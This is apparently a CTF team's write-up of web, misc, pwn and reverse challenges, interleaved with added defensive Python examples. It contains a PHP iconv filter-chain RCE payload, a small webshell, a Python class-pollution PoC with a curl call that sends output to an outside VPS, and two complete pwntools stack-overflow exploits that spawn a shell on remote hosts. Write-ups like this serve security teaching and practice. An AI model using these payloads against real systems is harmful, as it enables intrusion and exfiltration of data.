Ranking
Team Hook: 7th place
Solutions
WEB:
easyrce
:::info
Topic: file inclusion
:::
Source:
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
if (!empty($_GET['PK'])){
    $PK = $_GET['PK'];
    // The check runs on the raw, still percent-encoded query string.
    if(blacklistFilter($_SERVER["QUERY_STRING"])){
        include $PK;
    }else{
        highlight_file(__FILE__);
    }
}
// Returns the stripped string rather than a boolean, so any non-empty leftover counts as "passed".
function blacklistFilter($arg) {
    $blacklist = array('[', ']', ';', '?', '@', '(', ')', 'exec', 'eval', '$', 'phpinfo', 'flag', 'data', 'filter', '#');
    $filteredInput = str_replace($blacklist, '', $arg);
    return $filteredInput;
}
```
include $PK makes it clear this is a file-inclusion challenge.
Two approaches:
1. Read the flag through the file:// wrapper:
http://f87cb6bb.clsadp.com/?PK=file:///flag
2. Build RCE with an iconv filter chain.
Remember to switch to your own phone hotspot and open the browser in incognito mode.
payload:
:::info
http://f87cb6bb.clsadp.com/?PK=php://%66%69%6c%74%65%72/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd&0=cat /*
:::
Reference links
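Added example (not from the write-up or the challenge): a Python model of why blacklistFilter() lets both solutions through, placed beside a hardened include check. ALLOWED_PAGES and the short php:// sample value used in testing are constructed for this example.

```python
from typing import Optional
from urllib.parse import parse_qs

# Token list copied from the challenge's blacklistFilter().
BLACKLIST = ['[', ']', ';', '?', '@', '(', ')', 'exec', 'eval', '$',
             'phpinfo', 'flag', 'data', 'filter', '#']

def original_check(query_string: str) -> bool:
    """Model of blacklistFilter() as its caller uses it.

    PHP's str_replace() strips every token from the raw, still
    percent-encoded QUERY_STRING and returns what is left; the caller's if()
    treats any non-empty leftover as true. So the check only fails on an empty
    query string, and a percent-encoded token ('%66%69%6c%74%65%72' for
    'filter') is not even stripped.
    """
    leftover = query_string
    for token in BLACKLIST:
        leftover = leftover.replace(token, '')
    return leftover != ''

# Constructed allow-list of pages this script would agree to include.
ALLOWED_PAGES = {'home.php', 'about.php'}

def hardened_resolve(query_string: str) -> Optional[str]:
    """Return the page to include, or None to refuse.

    The parameter is decoded first and then compared as a whole against an
    allow-list, so wrapper schemes (file://, php://, data:) and encoding
    tricks never reach include(); a repeated PK parameter is refused too.
    """
    values = parse_qs(query_string, keep_blank_values=True).get('PK', [])
    if len(values) != 1:
        return None
    return values[0] if values[0] in ALLOWED_PAGES else None
```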
mua
:::info
Topic: robots.txt, substr slicing
:::
```php
<?php
ignore_user_abort(true);
set_time_limit(0);
$file = 'shell.php';
$code = '<?php if(md5($_GET["pass"])==="c9b30e9fad74c62c2d0e4bb820964913"){ if(strlen($_GET[\'cmd\'])<9){ @system($_GET[\'cmd\']); } } ?>';
// Loop forever, rewriting shell.php every 5 ms.
while (1){
    file_put_contents($file,$code);
    usleep(5000);
}
?>
```
pass and cmd have to be supplied, but we could not find a preimage for c9b30e9fad74c62c2d0e4bb820964913, so we looked elsewhere.
Found /robots.txt.
Visiting http://ef1e9a02.clsadp.com/substr_pass.php shows a blank page; F12 reveals a hint.
Passing a and b to substr_pass.php shows that it accepts numeric parameters.
Walking through values of a and b in turn returns data, which brought substr() to mind: it is probably slicing some string.
Testing shows a goes up to 84 and b is 3; recalling pass above, we guessed this is the password for shell.php.
payload:
:::info
http://ef1e9a02.clsadp.com//shell.php?pass=password%E6%98%AF%E5%AF%8C%E5%BC%BA%E6%B0%91%E4%B8%BB%E6%96%87%E6%98%8E%E5%92%8C%E8%B0%90%E8%87%AA%E7%94%B1%E5%B9%B3%E7%AD%89%E5%85%AC%E6%AD%A3%E6%B3%95%E5%88%B6%E7%88%B1%E5%9B%BD%E6%95%AC%E4%B8%9A%E8%AF%9A%E4%BF%A1%E5%8F%8B%E5%96%84&cmd=cat%20/*
:::
PPP
:::info
Topic: Python prototype-chain pollution
:::
Home page:
Download the challenge attachment to get the source:
```python
from flask import Flask,request
import json
app = Flask(__name__)
def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)
def evilFunc(arg_1 , * , shell = False):
    if not shell:
        print(arg_1)
    else:
        print(__import__("os").popen(arg_1).read())
class Family:
    def __init__(self):
        pass
family = Family()
@app.route('/',methods=['POST', 'GET'])
def index():
    if request.data:
        merge(json.loads(request.data), family)
    evilFunc("whoami")
    return "fun"
@app.route('/eval',methods=['GET'])
def eval():
    if request.args.get('cmd'):
        cmd = request.args.get('cmd')
        evilFunc(cmd)
    return "ok"
app.run(host="0.0.0.0",port= 3000,debug=False)
```
This is Python prototype-chain pollution, exactly the case in this article: https://tttang.com/archive/1876/#toc_object
PoC used:
```json
{"__init__" : {"__globals__" :{"evilFunc" : {"__kwdefaults__" : {"shell" : 1}}}}}
```
Exfiltrate the result through a VPS:
/eval?cmd=curl%20http://vps:port
Base64-decode to get the flag:
flag{2514ba1af3b602ab0f46599e40eefdc5}
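Added example (not from the write-up or the challenge source): a replacement for merge() that keeps the JSON-update feature of index() but refuses the path the PoC walks (attribute access on a live object, dunder keys, unbounded nesting). safe_merge, apply_update, MAX_DEPTH and the sample request bodies are constructed for this example.

```python
import json

MAX_DEPTH = 16  # bound on nesting, chosen for this example

def safe_merge(src: dict, dst: dict, _depth: int = 0) -> dict:
    """Merge the parsed JSON object src into the plain dict dst.

    Compared with the challenge's merge(): the target must be a dict (no
    setattr on arbitrary objects, so no reaching __init__ or a function's
    __globals__), keys must be plain identifiers that do not start with '__',
    and nesting depth is bounded.
    """
    if not isinstance(src, dict) or not isinstance(dst, dict):
        raise TypeError("merge works on plain dicts only")
    if _depth > MAX_DEPTH:
        raise ValueError("payload nested too deeply")
    for key, value in src.items():
        if not isinstance(key, str) or not key.isidentifier() or key.startswith("__"):
            raise ValueError(f"rejected key {key!r}")
        if isinstance(value, dict):
            node = dst.setdefault(key, {})
            if not isinstance(node, dict):
                raise TypeError(f"cannot merge an object into {key!r}")
            safe_merge(value, node, _depth + 1)
        else:
            dst[key] = value
    return dst

def apply_update(body: bytes, state: dict) -> dict:
    """Parse a request body the way index() does, then merge it safely."""
    return safe_merge(json.loads(body), state)

# The write-up's PoC: __init__ -> __globals__ -> evilFunc -> __kwdefaults__
# would flip evilFunc's keyword default shell=False in the original merge().
POC = b'{"__init__":{"__globals__":{"evilFunc":{"__kwdefaults__":{"shell":1}}}}}'

def poc_is_rejected() -> bool:
    try:
        apply_update(POC, {})
    except (ValueError, TypeError):
        return True
    return False
```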
Misc
云缨
Opening the attachment shows many repeated digits 0, 1, 2, 4 and 8; a web search identifies this as the Yunying (01248) cipher.
A script yields the flag:
Flag{YUNYINGISEASY}
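The write-up does not include its script; this is an added decoder for the 01248 cipher as described above (0 separates letters, the digits 1/2/4/8 within a letter sum to its alphabet position), plus an encoder used only to build test input. SAMPLE is a constructed string, not the challenge attachment.

```python
# Decoder and encoder for the 01248 "Yunying" cipher: the digit 0 separates
# letters, and within a letter the digits 1, 2, 4 and 8 are summed to give the
# letter's 1-based alphabet position (1 = A ... 26 = Z).
LETTER_DIGITS = "1248"

def decode_01248(cipher: str) -> str:
    cipher = "".join(cipher.split())  # tolerate spaces/newlines in the file
    letters = []
    for group in cipher.split("0"):
        if not group:
            continue  # runs of zeros or leading/trailing zeros add no letter
        bad = set(group) - set(LETTER_DIGITS)
        if bad:
            raise ValueError(f"unexpected digits {sorted(bad)} in group {group!r}")
        value = sum(int(d) for d in group)
        if not 1 <= value <= 26:
            raise ValueError(f"group {group!r} sums to {value}, outside A..Z")
        letters.append(chr(ord("A") + value - 1))
    return "".join(letters)

def encode_01248(text: str) -> str:
    """Greedy encoder. The cipher accepts any multiset of 1/2/4/8 with the
    right sum, so this yields one valid encoding, not the only one."""
    groups = []
    for ch in text.upper():
        if not "A" <= ch <= "Z":
            raise ValueError(f"cannot encode {ch!r}")
        n = ord(ch) - ord("A") + 1
        digits = []
        for d in (8, 4, 2, 1):
            while n >= d:
                digits.append(str(d))
                n -= d
        groups.append("".join(digits))
    return "0".join(groups)

# Constructed sample (not the challenge attachment); decodes to WELLDONE.
SAMPLE = "8842101220480224404014224202480122"
```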
hack_dns
The download is an archive; brute-forcing gives the password 258369, which yields a packet capture and an image.
Open the capture in Wireshark and filter on dns, as the challenge name hints; there are characters in front of test.com. Printing their hex values and converting them to characters reveals a Vigenère cipher, so the key is needed.
The image is named key. In WinHex there is a string at the end of the file; Base64-decoding it gives half of key2. Right-click > Properties shows a string of Korean; decoding it with the Korean-character cipher gives the other half of key2.
Vigenère decryption gives flag{6fc0e1z6q897033qc0y1tv40915o659}
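Added example (not the team's tooling): the extraction pipeline described above, run over constructed tshark-style DNS lines, hex-decoding the labels in front of test.com and undoing the Vigenère step. The log lines, the plaintext and the key "KEY" are constructed placeholders, since the real key and capture are not on the page.

```python
import re

# Constructed tshark-style output (not the challenge capture): each query name
# carries one hex-encoded chunk of the ciphertext as the label before test.com.
CONSTRUCTED_LOG = """\
1 0.000000 10.0.0.5 -> 10.0.0.1 DNS 74 Standard query 0x1a2b A 70707971.test.com
2 0.000912 10.0.0.1 -> 10.0.0.5 DNS 90 Standard query response 0x1a2b A 70707971.test.com A 203.0.113.7
3 1.004113 10.0.0.5 -> 10.0.0.1 DNS 74 Standard query 0x1a2c A 7b686c63.test.com
4 2.010271 10.0.0.5 -> 10.0.0.1 DNS 68 Standard query 0x1a2d A 7d.test.com
"""
# Matches queries only; response lines say "Standard query response", so a
# chunk echoed back by the resolver is not counted twice.
LABEL_RE = re.compile(r"Standard query 0x[0-9a-f]+ A ([0-9a-fA-F]+)\.test\.com")

def extract_ciphertext(log: str) -> str:
    """Concatenate the hex labels in query order and decode them to text."""
    chunks = [m.group(1) for m in map(LABEL_RE.search, log.splitlines()) if m]
    return bytes.fromhex("".join(chunks)).decode("ascii")

def vigenere_decrypt(ciphertext: str, key: str) -> str:
    """Classic Vigenère: each letter is shifted back by the key letter, and the
    key advances only on letters, so digits and braces pass through unchanged
    (which is why the recovered flag keeps its digits)."""
    shifts = [ord(k.upper()) - ord("A") for k in key if k.isalpha()]
    if not shifts:
        raise ValueError("key must contain at least one letter")
    out, j = [], 0
    for ch in ciphertext:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base - shifts[j % len(shifts)]) % 26 + base))
            j += 1
        else:
            out.append(ch)
    return "".join(out)

def recover_flag(log: str = CONSTRUCTED_LOG, key: str = "KEY") -> str:
    # "KEY" is a constructed placeholder; the real key came from the image.
    return vigenere_decrypt(extract_ciphertext(log), key)
```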
Pwn
stack
file shows a 64-bit binary; checking the protections in gdb, only NX is enabled.
Loading it into IDA shows a stack overflow,
and there is a shell function, so the overflow gives a shell directly.
Exp:
```python
#coding=utf-8
# Python 2 / old pwntools string semantics (str payloads, "\x00" padding).
from pwn import *
from LibcSearcher import *
from pwnlib import *
import base64
#context.arch="amd64"
sh=remote("60.204.130.55",10005)
elf=ELF("./stack")
libc=ELF("libc.so.6")
# I/O shorthands
un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-libc.sym[a]   # libc base from a leaked 6-byte pointer
inter=lambda :sh.interactive()
ret=0x40082C     # lone ret gadget, keeps the stack 16-byte aligned before the call
shell=0x40082D   # the binary's shell function (no PIE, so the address is fixed)
un("name?\n")
sd("Hook")
un("you?\n")
sl("a"*0x98+p64(ret)+p64(shell))   # 0x98 bytes of padding up to the saved return address
inter()
```
alloca
64-bit, with address randomization (PIE) enabled.
The welcome function can leak an address; debugging in gdb shows it is <init+68>, so leaking it gives the program base.
In vuln, read's third argument is unsigned; analysis shows that entering -8 to -23 in nbytes[0] makes v0 = 0, which allows the overflow that leaks the libc base.
Get system and /bin/sh,
then return to main; now with system and /bin/sh in hand,
the same method gets a shell.
EXP:
```python
#coding=utf-8
# Python 2 / old pwntools string semantics (str payloads, .next() on the search iterator).
from pwn import *
from LibcSearcher import *
from pwnlib import *
import base64
#context.arch="amd64"
sh=remote("121.196.192.181",10007)
#sh=process("./sleep")
elf=ELF("./pwn4")
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc=ELF("libc.so.6")
# I/O shorthands
un=lambda a:sh.recvuntil(a)
rv=lambda a:sh.recv(a)
rl=lambda:sh.recvline()
sd=lambda a:sh.send(a)
sl=lambda a:sh.sendline(a)
Jz=lambda a:u64(sh.recv(6)+"\x00"*2)-libc.sym[a]   # libc base from a leaked 6-byte pointer
inter=lambda :sh.interactive()
un("name? ")
sd("a"*8)                                 # fill the name buffer so the <init+68> pointer prints right after it
un("Hello! aaaaaaaa")
cxjz=u64(sh.recv(6)+"\x00"*2)-0x122D      # leaked <init+68> minus its offset in the binary = program base
pop_rdi=0x1463+cxjz
ret=cxjz+0x1464
puts_got=elf.got['puts']+cxjz
puts=elf.plt['puts']+cxjz
start=cxjz+0x12A7                          # return here to reach the vulnerable read a second time
un("long? ")
sl("-23")                                  # negative length, read as unsigned, lets the following read overflow
un("say? ")
sd("a"*0x18+p64(pop_rdi)+p64(puts_got)+p64(puts)+p64(start))   # round 1: leak puts@got
jz=Jz("puts")                              # libc base
system=jz+libc.sym['system']
bin_sh=jz+libc.search("/bin/sh").next()
un("long? ")
sl("-23")
un("say? ")
sd("a"*0x18+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system))     # round 2: system("/bin/sh")
inter()
```
Reverse
ezpython
The download is main.exe; unpacking it with pyinstxtractor gives main.pyc.
Decompiling the pyc online at https://tool.lu/pyc/ gives the information.
XOR decryption script:
```python
# XOR every character of the recovered string with 5 to get the flag
# (renamed from str so the builtin is not shadowed)
enc = 'cidb~071c75g62=a=d2=acc211c010`1<`gacx'
flag = ""
for i in range(len(enc)):
    flag += chr(ord(enc[i]) ^ 5)
print(flag)
```
ezpe
32-bit, not packed; analyze in IDA.
Strings show there is Brainfuck-encrypted content.
Drop it into 010 Editor: key1 is known, but there is a trap, as there are two key2 values, and the one at the end of the PE file is the real one. Concatenate them to get the flag.
flag is flag{key1_key2},but where is the key???Do not frustrated!I can give you key1,key1:w0w! Now go find key2
Fake: key2:PE_sT3uctU3e_1$   Real: key2:PE_sT3uctU3e_1$_suBt1e
flag{w0w!_PE_sT3uctU3e_1$_suBt1e}